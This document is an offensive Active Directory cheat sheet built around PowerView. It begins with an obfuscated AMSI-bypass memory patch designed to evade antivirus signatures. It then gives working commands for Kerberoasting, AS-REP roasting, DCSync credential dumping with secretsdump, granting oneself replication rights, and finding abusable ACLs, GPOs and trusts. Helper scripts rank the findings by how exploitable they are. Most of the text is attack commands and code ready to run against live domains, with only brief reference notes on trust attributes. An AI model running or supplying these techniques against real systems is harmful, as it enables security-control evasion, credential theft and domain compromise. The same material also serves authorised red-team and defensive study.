
Import PowerView

The execution policy must allow unsigned scripts (set it to Bypass for the current process).

Import-Module .\powerview.ps1

If the import is blocked by AMSI, run the following in the same PowerShell process before importing again. The patch only affects the current process, and the library and function names are assembled at runtime so that the script itself does not contain the strings AMSI signatures look for; do not paste the plain names into it.

# Rasta Mouse's AmsiScanBuffer patch (class and variable names randomised).
$dpqmb = @"
using System;
using System.Runtime.InteropServices;
public class dpqmb {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr bqvxfg, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $dpqmb

# Load the AMSI library (name assembled from character codes) ...
$shxnhxm = [dpqmb]::LoadLibrary("$([CHaR]([bYtE]0x61)+[Char](109*80/80)+[chAr]([bYte]0x73)+[CHAR](57+48)+[chAR](46*12/12)+[cHAr]([Byte]0x64)+[ChaR]([BYtE]0x6c)+[chAR](55+53))")
# ... and resolve the scan-buffer export (accented string normalised to FormD, then the
# combining marks stripped with -replace '\p{Mn}', both built from character codes).
$dewhnt = [dpqmb]::GetProcAddress($shxnhxm, "$(('ÀmsîScã'+'nBuffer').NormALizE([ChAr](23+47)+[CHAR](111)+[CHAr]([BYTe]0x72)+[CHAr]([bYTe]0x6d)+[cHaR]([ByTE]0x44)) -replace [chaR]([BYte]0x5c)+[ChAr](42+70)+[Char](123*119/119)+[Char](77+31-31)+[chaR](3+107)+[cHAR]([bytE]0x7d))")
# Make the first 6 bytes of the function writable (0x40 = PAGE_EXECUTE_READWRITE);
# the length matches the 6-byte patch copied below.
$p = 0
[dpqmb]::VirtualProtect($dewhnt, [uint32]6, 0x40, [ref]$p)
# Patch: mov eax, 0x80070057 (E_INVALIDARG) ; ret
# Every scan now returns an error instead of a verdict, so the caller lets the content run.
$jojn = "0xB8"
$mbww = "0x57"
$rjsu = "0x00"
$bbnx = "0x07"
$uxow = "0x80"
$aask = "0xC3"
$xmpmv = [Byte[]] ($jojn,$mbww,$rjsu,$bbnx,$uxow,$aask)
[System.Runtime.InteropServices.Marshal]::Copy($xmpmv, 0, $dewhnt, 6)

Users info

Domain users

Dump all domain users

Get-DomainUser -domain ${domain} -server ${dcIp}

SPN users

Dump users with an SPN set; a service ticket can be requested for each of them and cracked offline (Kerberoasting)

Get-DomainUser -SPN -domain ${domain} -server ${dcIp}

GMSA ReadPassword

List gMSA accounts and the principals allowed to read their password (ActiveDirectory RSAT module, not PowerView). The permission lives in PrincipalsAllowedToRetrieveManagedPassword (msDS-GroupMSAMembership):

Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | Select-Object Name, PrincipalsAllowedToRetrieveManagedPassword

Filtering on msDS-ManagedPassword instead only shows the gMSAs whose password the current user can already read, because the DC returns that attribute only to authorised readers:

Get-ADServiceAccount -Filter * -Properties msDS-ManagedPassword | Where-Object { $_.'msDS-ManagedPassword' } | Select-Object Name

ASREP users

Dump users with Kerberos pre-authentication disabled; their AS-REP can be requested without a domain account and cracked offline (AS-REP roasting)

Get-DomainUser -PreauthNoRequired -domain ${domain} -server ${dcIp}

Domain admins

Dump the members of Domain Admins (-Recurse expands nested groups)

Get-DomainGroupMember -Identity "Domain Admins" -Recurse -domain ${domain} -server ${dcIp}

Domain trust

Get all domain trusts

Displays every trusted domain together with the direction, type and attributes of each trust link (the type and attribute values are listed below)

Get-DomainTrust -domain ${domain} -server ${dcIp}


Trust types (TrustType):

  • DOWNLEVEL/WINDOWS_NON_ACTIVE_DIRECTORY (0x00000001) : a trusted Windows domain that is NOT running Active Directory (NT4-style).
  • UPLEVEL/WINDOWS_ACTIVE_DIRECTORY (0x00000002) : a trusted Windows domain that IS running Active Directory.
  • MIT (0x00000003) : a trusted non-Windows (*nix) realm running an RFC 4120-compliant Kerberos distribution; labelled MIT because MIT published RFC 4120.

Trust attributes (TrustAttributes, a bitmask; several flags can be set at once):

  • NON_TRANSITIVE (0x00000001) : the trust cannot be used transitively. If Domain A trusts Domain B and Domain B trusts Domain C, Domain A does not automatically trust Domain C, and you cannot query Active Directory information from domains further up the chain than the non-transitive point. External trusts are implicitly non-transitive.
  • UPLEVEL_ONLY (0x00000002) : only Windows 2000 and newer clients can use the trust.
  • QUARANTINED_DOMAIN/FILTER_SID (0x00000004) : SID filtering is enabled.
  • FOREST_TRANSITIVE (0x00000008) : cross-forest trust between the root domains of two forests, both at forest functional level Windows Server 2003 or above.
  • CROSS_ORGANIZATION (0x00000010) : the trust is to a domain or forest that is not part of the organization; authenticating principals get the OTHER_ORGANIZATION SID added, which means selective authentication is enabled (resources must explicitly allow the foreign principals). Rarely seen in the field; see the MSDN documentation on selective authentication.
  • WITHIN_FOREST (0x00000020) : the trusted domain is within the same forest, meaning a parent->child or cross-link relationship.
  • TREAT_AS_EXTERNAL (0x00000040) : the trust is to be treated as external for trust boundary purposes. According to the documentation, "If this bit is set, then a cross-forest trust to a domain is to be treated as an external trust for the purposes of SID Filtering. Cross-forest trusts are more stringently filtered than external trusts. This attribute relaxes those cross-forest trusts to be equivalent to external trusts." In other words the weaker external-trust filtering rules apply to that forest trust, which is worth checking before attempting SID history abuse across it.
  • USES_RC4_ENCRYPTION (0x00000080) : if the TrustType is MIT, specifies that the trust supports RC4 keys.
  • USES_AES_KEYS (0x00000100) : AES keys are used for the trust's Kerberos keys (inter-realm tickets are not limited to RC4).
  • CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) : "If this bit is set, tickets granted under this trust MUST NOT be trusted for delegation." Described further in MS-KILE (Cross-Domain Trust and Referrals); it blocks unconstrained-delegation abuse across the trust.
  • PIM_TRUST (0x00000400) : "If this bit and the TATE (treat as external) bit are set, then a cross-forest trust to a domain is to be treated as Privileged Identity Management trust for the purposes of SID Filtering." According to MS-PAC (SID Filtering and Claims Transformation), "A domain can be externally managed by a domain that is outside the forest. The trusting domain allows SIDs that are local to its forest to come over a PrivilegedIdentityManagement trust." Rarely seen in the field and only supported at functional level 2012 R2 and above, but it warrants investigation when present.
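Added example, not PowerView code: PowerView's Get-DomainTrust already prints TrustAttributes as flag names, but raw trustedDomain objects (Get-DomainObject, ADSI, ldapsearch) carry the integer. The helper below (hypothetical name Get-TrustAssessment) decodes the bitmask with the flag values listed above and turns each trust into an assessment of what the attributes mean for an attacker: which SID-filtering regime applies, whether the trust is transitive, whether selective authentication or the TGT-delegation block is on. The sample trusts are constructed input, not real data.

```powershell
# Added example, not PowerView code. Decode raw TrustAttributes integers with the
# flag values listed above and assess what each trust allows.
[Flags()] enum TrustAttribute {
    NON_TRANSITIVE                       = 0x001
    UPLEVEL_ONLY                         = 0x002
    FILTER_SIDS                          = 0x004   # QUARANTINED_DOMAIN
    FOREST_TRANSITIVE                    = 0x008
    CROSS_ORGANIZATION                   = 0x010   # selective authentication
    WITHIN_FOREST                        = 0x020
    TREAT_AS_EXTERNAL                    = 0x040
    USES_RC4_ENCRYPTION                  = 0x080
    USES_AES_KEYS                        = 0x100
    CROSS_ORGANIZATION_NO_TGT_DELEGATION = 0x200
    PIM_TRUST                            = 0x400
}

function Get-TrustAssessment {
    # Hypothetical helper. Binds to Get-DomainTrust output (TargetName/TrustDirection/
    # TrustAttributes) as well as to raw LDAP attribute names (name/trustdirection/trustattributes).
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipelineByPropertyName)] [Alias('name', 'TargetName')] [string] $TrustName,
        [Parameter(ValueFromPipelineByPropertyName)] [string] $TrustDirection,
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)] [int] $TrustAttributes
    )
    process {
        $attr  = [TrustAttribute]$TrustAttributes
        $notes = [System.Collections.Generic.List[string]]::new()

        # The SID-filtering regime decides whether SID history abuse is on the table.
        if ($attr.HasFlag([TrustAttribute]::WITHIN_FOREST)) {
            $notes.Add('intra-forest trust: no SID filtering, SID history abuse towards the parent/root domain works')
        }
        elseif ($attr.HasFlag([TrustAttribute]::FOREST_TRANSITIVE)) {
            if ($attr.HasFlag([TrustAttribute]::TREAT_AS_EXTERNAL)) {
                $notes.Add('forest trust treated as external for SID filtering (relaxed rules)')
            } else {
                $notes.Add('forest trust: SID filtering enforced by default')
            }
        }
        elseif ($attr.HasFlag([TrustAttribute]::FILTER_SIDS)) {
            $notes.Add('external trust with SID filtering (quarantine) enabled')
        }
        else {
            $notes.Add('external trust without the quarantine flag: SID filtering not enabled, test SID history')
        }
        if ($attr.HasFlag([TrustAttribute]::NON_TRANSITIVE)) {
            $notes.Add('non-transitive: domains beyond this one cannot be reached or enumerated through it')
        }
        if ($attr.HasFlag([TrustAttribute]::CROSS_ORGANIZATION)) {
            $notes.Add('selective authentication: each resource must explicitly allow the foreign principal')
        }
        if ($attr.HasFlag([TrustAttribute]::CROSS_ORGANIZATION_NO_TGT_DELEGATION)) {
            $notes.Add('TGT delegation over this trust is disabled (unconstrained delegation across it is blocked)')
        }
        if (-not $attr.HasFlag([TrustAttribute]::USES_AES_KEYS)) {
            $notes.Add('USES_AES_KEYS not set: the trust does not advertise AES keys')
        }

        [pscustomobject]@{
            Trust      = $TrustName
            Direction  = $TrustDirection
            Attributes = "$attr"
            Notes      = $notes -join '; '
        }
    }
}

# Constructed sample input shaped like raw trustedDomain attributes (not real trusts).
$sampleTrusts = @(
    [pscustomobject]@{ name = 'corp.local';   TrustDirection = 'Bidirectional'; TrustAttributes = 0x020 }  # child -> parent
    [pscustomobject]@{ name = 'partner.com';  TrustDirection = 'Inbound';       TrustAttributes = 0x004 }  # quarantined external
    [pscustomobject]@{ name = 'other.forest'; TrustDirection = 'Bidirectional'; TrustAttributes = 0x208 }  # forest trust, no TGT delegation
)
$sampleTrusts | Get-TrustAssessment | Format-List
```

Against a live domain, feed it PowerView's trust objects: `Get-DomainTrust -domain ${domain} -server ${dcIp} | Get-TrustAssessment`, or raw objects via `Get-DomainObject -LDAPFilter '(objectClass=trustedDomain)' -Properties name,trustdirection,trustattributes`, which should return trustattributes as an integer.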

Get information from a trusted domain

dcIp is the IP of the initial domain controller (the domain you already have a foothold in); -Domain selects the trusted domain to query

Get-DomainUser -domain ${trustedDomain} -server ${dcIp}

Get groups with users from other domains

Return the groups of targetDomain that contain at least one member from another domain (foreign security principals).

The SIDs returned can be converted with the ConvertFrom-SID PowerView command.

Get-DomainForeignGroupMember -Domain ${targetDomain}


Kerberoasting

Request a service ticket for every SPN user and dump the hashes; they must be cracked offline

Invoke-Kerberoast -domain ${domain} -server ${dcIp} -OutputFormat John | fl
  • -OutputFormat takes John or Hashcat, depending on the cracker the hashes are fed to


DCSync

Once an account holds the replication rights on the domain object (a Domain Admin, or a principal granted them as in Grant DCSync below), dump a target account's secrets over DRSUAPI with impacket:

secretsdump.py ${domain}/${user}@${dcIp} -just-dc-user ${adminUserToPwn}

Unconstrained Delegation

Computers trusted for unconstrained delegation (the TGT of any user authenticating to them is cached on the host). Domain controllers always appear in this list since they have the flag by default; the member servers in the output are the interesting ones.

Get-DomainComputer -Unconstrained

Users that can create or modify GPOs

Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

Adjust the DC= components to the target domain. This returns the ACEs scoped to the Group-Policy-Container class under the Policies container, i.e. who can create (CreateChild) or delete (DeleteChild) GPO objects. The SID can be translated using ConvertFrom-SID.

Likewise, it is possible to retrieve the GPOs that a given user (by SID) can modify; the regex keeps only write rights, so read-only ACEs are not listed:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "${userSID}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

ACL on users

Retrieve the ACEs that compromisedUser holds on the userTargeted object which allow modifying it (GenericAll, GenericWrite, WriteProperty, WriteDacl, WriteOwner, or an extended right such as a forced password reset):

Get-DomainObjectAcl -Identity ${userTargeted} -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner|ExtendedRight" -and $_.SecurityIdentifier -match "${compromisedUserSID}" } | select SecurityIdentifier, ActiveDirectoryRights, ObjectAceType | fl
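Added example, not PowerView code, serving both the GPO and the user ACL queries above: the regex filters list every matching ACE, including noise granted to Domain Admins or SYSTEM, and do not say why a right matters. The helper below (hypothetical name Find-InterestingAce) takes the objects Get-DomainObjectAcl -ResolveGUIDs emits, drops built-in high-privilege principals, optionally restricts to SIDs you control, and tags each remaining ACE with the abuse it enables. The ACEs at the bottom are constructed sample data in PowerView's output shape, not real directory content.

```powershell
# Added example, not PowerView code. Triage ACEs from Get-DomainObjectAcl -ResolveGUIDs
# (on a user, a group, a GPO or the domain object) and explain why each one matters.
function Find-InterestingAce {
    # Hypothetical helper; expects objects carrying ObjectDN, ActiveDirectoryRights,
    # ObjectAceType and SecurityIdentifier, as PowerView emits them.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Ace,
        [string[]] $PrincipalSid,                               # keep only ACEs granted to these SIDs
        [string[]] $IgnoreSid = @('S-1-5-18', 'S-1-5-32-544'),  # SYSTEM, BUILTIN\Administrators
        [string[]] $IgnoreRid = @('512', '516', '519')          # Domain Admins, Domain Controllers, Enterprise Admins
    )
    process {
        $sid = "$($Ace.SecurityIdentifier)"
        if ($PrincipalSid -and $sid -notin $PrincipalSid) { return }
        if ($sid -in $IgnoreSid -or ($sid -split '-')[-1] -in $IgnoreRid) { return }

        $rights = "$($Ace.ActiveDirectoryRights)" -split ',\s*'
        $type   = "$($Ace.ObjectAceType)"        # -ResolveGUIDs yields 'All' for an untyped ACE
        $why = switch ($true) {
            { 'GenericAll'   -in $rights } { 'GenericAll: full control of the object'; break }
            { 'WriteDacl'    -in $rights } { 'WriteDacl: can grant itself any right on the object'; break }
            { 'WriteOwner'   -in $rights } { 'WriteOwner: take ownership, then rewrite the DACL'; break }
            { 'GenericWrite' -in $rights } { 'GenericWrite: write any attribute (SPN for targeted Kerberoast, GPO content)'; break }
            { 'ExtendedRight' -in $rights -and $type -in @('All', 'User-Force-Change-Password') } { "ExtendedRight (${type}): password reset without the old password; on the domain object, All also covers the replication rights"; break }
            { 'ExtendedRight' -in $rights -and $type -like 'DS-Replication-Get-Changes*' } { "ExtendedRight ${type}: DCSync component"; break }
            { 'WriteProperty' -in $rights -and $type -eq 'All' } { 'WriteProperty on every attribute'; break }
            { 'WriteProperty' -in $rights -and $type -eq 'Service-Principal-Name' } { 'WriteProperty Service-Principal-Name: targeted Kerberoast'; break }
            { ('WriteProperty' -in $rights -or 'Self' -in $rights) -and $type -eq 'Member' } { 'can add members to the group'; break }
            default { $null }
        }
        if (-not $why) { return }

        # Resolve the SID with PowerView when it is loaded, otherwise keep the raw SID.
        $who = if (Get-Command ConvertFrom-SID -ErrorAction SilentlyContinue) { ConvertFrom-SID $sid } else { $sid }
        [pscustomobject]@{
            ObjectDN  = $Ace.ObjectDN
            Principal = $who
            Rights    = $rights -join ', '
            AceType   = $type
            Why       = $why
        }
    }
}

# Constructed sample ACEs in PowerView's output shape (not real directory data).
$sampleAces = @(
    [pscustomobject]@{ ObjectDN = 'CN=svc_sql,OU=Service,DC=dev,DC=oth,DC=io'; ActiveDirectoryRights = 'WriteProperty'; ObjectAceType = 'Service-Principal-Name'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1105' }
    [pscustomobject]@{ ObjectDN = 'CN=jdoe,OU=Users,DC=dev,DC=oth,DC=io'; ActiveDirectoryRights = 'ExtendedRight'; ObjectAceType = 'User-Force-Change-Password'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1105' }
    [pscustomobject]@{ ObjectDN = 'CN=jdoe,OU=Users,DC=dev,DC=oth,DC=io'; ActiveDirectoryRights = 'GenericAll'; ObjectAceType = 'All'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-512' }   # Domain Admins: dropped as noise
    [pscustomobject]@{ ObjectDN = 'CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dev,DC=oth,DC=io'; ActiveDirectoryRights = 'WriteProperty, WriteDacl'; ObjectAceType = 'All'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1106' }
    [pscustomobject]@{ ObjectDN = 'CN=jdoe,OU=Users,DC=dev,DC=oth,DC=io'; ActiveDirectoryRights = 'ReadProperty'; ObjectAceType = 'All'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1105' }   # read-only: dropped
)
$sampleAces | Find-InterestingAce | Format-Table -AutoSize
```

Live usage follows the two queries above: `Get-DomainObjectAcl -Identity ${userTargeted} -ResolveGUIDs | Find-InterestingAce -PrincipalSid ${compromisedUserSID}` for one target, and `Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Find-InterestingAce` for every GPO. Inherited ACEs are kept on purpose: they are just as exploitable as explicit ones.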

Grant DCSync

Once a principal you control has WriteDacl on the domain object, grant it the replication rights (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set, which is what -Rights DCSync expands to):

Add-DomainObjectAcl -TargetIdentity "${domainDN}" -PrincipalIdentity ${compromisedUser} -Rights DCSync

With domainDN being the distinguished name of the domain head, e.g. DC=dev,DC=oth,DC=io. Afterwards secretsdump.py run as that principal (see DCSync above) works against ${dcIp}.

